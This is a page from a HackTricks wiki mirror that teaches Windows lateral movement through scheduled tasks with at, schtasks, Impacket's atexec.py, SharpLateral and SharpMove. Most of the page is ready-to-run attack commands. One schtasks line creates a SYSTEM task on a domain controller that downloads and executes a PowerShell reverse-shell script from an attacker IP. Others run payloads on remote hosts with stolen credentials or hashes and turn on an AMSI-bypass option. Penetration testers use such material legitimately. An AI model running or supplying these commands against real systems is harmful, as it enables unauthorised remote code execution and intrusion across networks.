maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/windows-hardening/lateral-movement/atexec.md
Carlos Polop 72f20a3fa2 impr
2025-04-07 02:44:44 +02:00

1.6 KiB
Raw Blame History

AtExec / SchtasksExec

{{#include ../../banners/hacktricks-training.md}}

How Does it works

At allows to schedule tasks in hosts where you know username/(password/Hash). So, you can use it to execute commands in other hosts and get the output.

At \\victim 11:00:00PM shutdown -r

Using schtasks you need first to create the task and then call it:

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>

schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

You can use Impacket's atexec.py to execute commands on remote systems using the AT command. This requires valid credentials (username and password or hash) for the target system.

atexec.py 'DOMAIN'/'USER':'PASSWORD'@'target_ip' whoami

You can also use SharpLateral:

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

You can use SharpMove:

SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password

More information about the use of schtasks with silver tickets here.

{{#include ../../banners/hacktricks-training.md}}